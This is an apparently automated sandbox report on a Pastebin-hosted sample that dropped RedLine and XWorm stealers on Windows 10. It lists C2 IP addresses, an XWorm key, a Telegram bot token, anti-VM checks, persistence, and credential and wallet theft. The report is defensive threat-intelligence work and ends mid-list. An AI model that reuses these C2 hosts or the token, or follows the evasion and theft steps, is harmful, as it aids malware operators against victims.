Analysis
-
max time kernel
2681s -
max time network
2704s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
22-05-2024 19:37
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://pastebin.com/raw/DUwCkj2E
Resource
win10-20240404-en
General
-
Target
https://pastebin.com/raw/DUwCkj2E
Malware Config
Extracted
redline
@fgkyleoff
147.45.47.93:80
Extracted
xworm
5.0
83.143.112.35:7000
zXfBo4LwCYB4EEgV
-
Install_directory
%Temp%
-
install_file
Google chrome.exe
-
telegram
https://api.telegram.org/bot6671364658:AAFSR01MD7rod9u5ExKsea5-2_kUtJR70Ks
Signatures
-
Cobalt Strike reflective loader 1 IoCs
Detects the reflective loader used by Cobalt Strike.
Processes:
resource yara_rule behavioral1/files/0x0005000000030d03-37016.dat cobalt_reflective_dll -
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5880-20502-0x0000025FA30D0000-0x0000025FA30FC000-memory.dmp family_xworm -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5856-610-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
Processes:
AFK Journey.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest AFK Journey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse AFK Journey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService AFK Journey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF AFK Journey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo AFK Journey.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
AFK Journey.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AFK Journey.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ AFK Journey.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ AFK Journey.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
AFK Journey.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions AFK Journey.exe -
Blocklisted process makes network request 44 IoCs
Processes:
powershell.exeflow pid Process 2599 5880 powershell.exe 2607 5880 powershell.exe 2656 5880 powershell.exe 2788 5880 powershell.exe 2992 5880 powershell.exe 3062 5880 powershell.exe 3129 5880 powershell.exe 3219 5880 powershell.exe 3253 5880 powershell.exe 3308 5880 powershell.exe 3641 5880 powershell.exe 3653 5880 powershell.exe 3811 5880 powershell.exe 3952 5880 powershell.exe 3982 5880 powershell.exe 4024 5880 powershell.exe 4181 5880 powershell.exe 4271 5880 powershell.exe 4436 5880 powershell.exe 4578 5880 powershell.exe 4815 5880 powershell.exe 5064 5880 powershell.exe 5242 5880 powershell.exe 5346 5880 powershell.exe 5499 5880 powershell.exe 5573 5880 powershell.exe 6595 5880 powershell.exe 6606 5880 powershell.exe 6607 5880 powershell.exe 6617 5880 powershell.exe 6649 5880 powershell.exe 6650 5880 powershell.exe 6803 5880 powershell.exe 7272 5880 powershell.exe 7519 5880 powershell.exe 7826 5880 powershell.exe 7832 5880 powershell.exe 7943 5880 powershell.exe 7991 5880 powershell.exe 8119 5880 powershell.exe 8161 5880 powershell.exe 8175 5880 powershell.exe 8176 5880 powershell.exe 8179 5880 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 4612 powershell.exe 7896 powershell.exe -
Contacts a large (842) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 6 IoCs
Processes:
SaferWeb-installer.exeRAVEndPointProtection-installer.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\rsDwf.sys SaferWeb-installer.exe File created C:\Windows\system32\drivers\rsCamFilter020502.sys RAVEndPointProtection-installer.exe File created C:\Windows\system32\drivers\rsKernelEngine.sys RAVEndPointProtection-installer.exe File created C:\Windows\system32\drivers\rsElam.sys RAVEndPointProtection-installer.exe File opened for modification C:\Windows\system32\drivers\rsElam.sys RAVEndPointProtection-installer.exe File created C:\Windows\system32\drivers\rsDwf.sys SaferWeb-installer.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
AFK Journey.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools AFK Journey.exe -
Modifies Installed Components in the registry 2 TTPs 7 IoCs
Processes:
setup.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\ = "AVG Secure Browser" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\StubPath = "\"C:\\Program Files\\AVG\\Browser\\Application\\124.0.25039.207\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\Localized Name = "AVG Secure Browser" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\IsInstalled = "1" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\Version = "43,0,0,0" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components setup.exe -
Sets file execution options in registry 2 TTPs 2 IoCs
Processes:
AVGBrowserUpdate.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGBrowserUpdate.exe\DisableExceptionChainValidation = "0" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGBrowserUpdate.exe AVGBrowserUpdate.exe -
ACProtect 1.3x - 1.4x DLL software 5 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule behavioral1/files/0x0005000000033c82-56054.dat acprotect behavioral1/files/0x0005000000033c72-56049.dat acprotect behavioral1/files/0x0005000000033c71-56044.dat acprotect behavioral1/files/0x0005000000033c70-56039.dat acprotect behavioral1/files/0x0005000000033c6f-56034.dat acprotect -
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
rsEDRSvc.exersEngineSvc.exeAFK Journey.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rsEngineSvc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AFK Journey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AFK Journey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate AFK Journey.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
opera.exeAVGBrowser.exeopera.exeopera.exeopera.exeAVGBrowser.exeopera.exeopera.exeopera.exeopera.exeopera.exeAVGBrowser.exeopera.exeopera.exeAVGBrowser.exeAVGBrowser.exeAVGBrowser.exeopera.exeopera.exeAVGBrowser.exeopera.exeopera.exersAppUI.exeopera.exeopera.exersAppUI.exeopera.exeAVGBrowser.exeAVGBrowser.exeopera.exeopera.exeopera.exeopera.exeAVGBrowser.exeopera.exeAVGBrowser.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exelimpcbrowserex.exeopera.exeopera.exeAVGBrowser.exeopera.exeopera.exeAVGBrowser.exeopera.exeopera.exeAVGBrowser.exeopera.exeopera.exeopera.exersAppUI.exeAVGBrowser.exeAVGBrowser.exeopera.exeopera.exeopera.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation rsAppUI.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation rsAppUI.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation limpcbrowserex.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation rsAppUI.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation AVGBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation opera.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google chrome.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google chrome.lnk powershell.exe -
Executes dropped EXE 64 IoCs
Processes:
OperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOpera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeSoftware 1.30.1.exeSoftware 1.30.1.exeSoftware 1.30.1.exeinstaller.exeinstaller.exeinstaller_helper_64.exelauncher.exeopera.exeopera_crashreporter.exeopera.exeopera_crashreporter.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera_gx_splash.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera_autoupdate.exeopera_autoupdate.exelauncher.exeopera.exeopera.exeinstaller.exeopera_autoupdate.exeopera_autoupdate.exeopera.exepid Process 5464 OperaGXSetup.exe 3476 OperaGXSetup.exe 5760 OperaGXSetup.exe 6100 OperaGXSetup.exe 4264 OperaGXSetup.exe 5956 Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe 6084 assistant_installer.exe 6044 assistant_installer.exe 5740 Software 1.30.1.exe 5760 Software 1.30.1.exe 372 Software 1.30.1.exe 1068 installer.exe 5612 installer.exe 5908 installer_helper_64.exe 5448 launcher.exe 508 opera.exe 6124 opera_crashreporter.exe 1324 opera.exe 2164 opera_crashreporter.exe 5036 opera.exe 856 opera.exe 4764 opera.exe 2348 opera.exe 524 opera.exe 4628 opera.exe 4412 opera.exe 604 opera.exe 2548 opera.exe 392 opera.exe 3988 opera_gx_splash.exe 5312 opera.exe 5368 opera.exe 872 opera.exe 5652 opera.exe 3704 opera.exe 5712 opera.exe 4380 opera.exe 1424 opera.exe 1624 opera.exe 5432 opera.exe 3740 opera.exe 4120 opera.exe 1840 opera.exe 4756 opera.exe 4268 opera.exe 2584 opera.exe 5048 opera.exe 4280 opera.exe 1980 opera.exe 3892 opera.exe 2432 opera.exe 4256 opera.exe 3496 opera.exe 5700 opera.exe 4888 opera.exe 8180 opera_autoupdate.exe 5804 opera_autoupdate.exe 7584 launcher.exe 3480 opera.exe 6192 opera.exe 6272 installer.exe 6316 opera_autoupdate.exe 6368 opera_autoupdate.exe 6556 opera.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
AFK Journey.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wine AFK Journey.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\SOFTWARE\Wine AFK Journey.exe -
Loads dropped DLL 64 IoCs
Processes:
OperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeinstaller.exeinstaller.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exeopera.exepid Process 5464 OperaGXSetup.exe 3476 OperaGXSetup.exe 5760 OperaGXSetup.exe 6100 OperaGXSetup.exe 4264 OperaGXSetup.exe 1068 installer.exe 5612 installer.exe 508 opera.exe 508 opera.exe 1324 opera.exe 1324 opera.exe 5036 opera.exe 856 opera.exe 5036 opera.exe 856 opera.exe 5036 opera.exe 5036 opera.exe 5036 opera.exe 4764 opera.exe 5036 opera.exe 5036 opera.exe 5036 opera.exe 2348 opera.exe 2348 opera.exe 524 opera.exe 4764 opera.exe 524 opera.exe 4628 opera.exe 4412 opera.exe 4628 opera.exe 4412 opera.exe 604 opera.exe 2548 opera.exe 604 opera.exe 2548 opera.exe 392 opera.exe 392 opera.exe 5312 opera.exe 5368 opera.exe 5312 opera.exe 5368 opera.exe 872 opera.exe 1324 opera.exe 872 opera.exe 5652 opera.exe 5652 opera.exe 3704 opera.exe 3704 opera.exe 5712 opera.exe 4380 opera.exe 4380 opera.exe 1424 opera.exe 1624 opera.exe 1424 opera.exe 5432 opera.exe 3740 opera.exe 5432 opera.exe 3740 opera.exe 4120 opera.exe 5712 opera.exe 4120 opera.exe 1624 opera.exe 1840 opera.exe 4756 opera.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exeicacls.exepid Process 6272 icacls.exe 7660 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 26 IoCs
Processes:
installer.exesetup.exeAVGBrowserUpdateComRegisterShell64.exeAVGBrowserUpdateComRegisterShell64.exeAVGBrowserUpdateComRegisterShell64.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\WOW6432Node\CLSID\{8C63D4B8-CF89-4527-B10F-99914B6C207F}\LocalServer32\ServerExecutable = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Opera GX\\109.0.5097.98\\notification_helper.exe" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A725D612-7D72-48B8-857A-4777781F415C}\LocalServer32\ServerExecutable = "C:\\Program Files\\AVG\\Browser\\Application\\124.0.25039.207\\notification_helper.exe" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32\ = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\psmachine_64.dll" AVGBrowserUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32\ = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\psmachine_64.dll" AVGBrowserUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32\ = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\psmachine_64.dll" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A725D612-7D72-48B8-857A-4777781F415C}\LocalServer32\ = "\"C:\\Program Files\\AVG\\Browser\\Application\\124.0.25039.207\\notification_helper.exe\"" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32\ = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\psmachine_64.dll" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32\ThreadingModel = "Both" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32\ThreadingModel = "Both" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32\ = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\psmachine_64.dll" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32\ThreadingModel = "Both" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\WOW6432Node\CLSID\{8C63D4B8-CF89-4527-B10F-99914B6C207F}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Opera GX\\109.0.5097.98\\notification_helper.exe\"" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32\ThreadingModel = "Both" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32\ = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\psmachine_64.dll" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32\ThreadingModel = "Both" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\WOW6432Node\CLSID\{8C63D4B8-CF89-4527-B10F-99914B6C207F}\LocalServer32 installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32\ThreadingModel = "Both" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{A725D612-7D72-48B8-857A-4777781F415C}\LocalServer32 setup.exe -
Processes:
resource yara_rule behavioral1/files/0x0005000000033c82-56054.dat upx behavioral1/files/0x0005000000033c72-56049.dat upx behavioral1/files/0x0005000000033c71-56044.dat upx behavioral1/files/0x0005000000033c70-56039.dat upx behavioral1/files/0x0005000000033c6f-56034.dat upx -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
All-In-One.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts All-In-One.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
